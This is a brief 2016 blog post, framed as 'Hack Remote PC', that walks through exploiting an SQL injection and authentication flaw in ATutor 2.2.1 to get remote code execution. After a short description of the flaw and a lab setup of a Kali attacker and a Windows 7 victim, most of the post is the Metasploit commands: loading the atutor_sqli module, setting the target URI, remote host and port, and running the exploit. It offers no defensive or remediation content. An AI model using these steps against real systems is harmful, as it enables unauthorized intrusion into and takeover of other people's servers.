Hack Remote PC using ATutor 2.2.1 SQL Injection / Remote Code Execution

at 8:15 AM Thursday, May 5, 2016
This module exploits SQL Injection vulnerability and authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authentication and reach the administrator's interface where they can upload malicious code.

Exploit Targets
ATutor 2.2.1

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/multi/http/atutor_sqli
msf exploit (atutor_sqli)>set targeturi /Atutor/
msf exploit (atutor_sqli)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (atutor_sqli)>set rport 80
msf exploit (atutor_sqli)>exploit       

Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)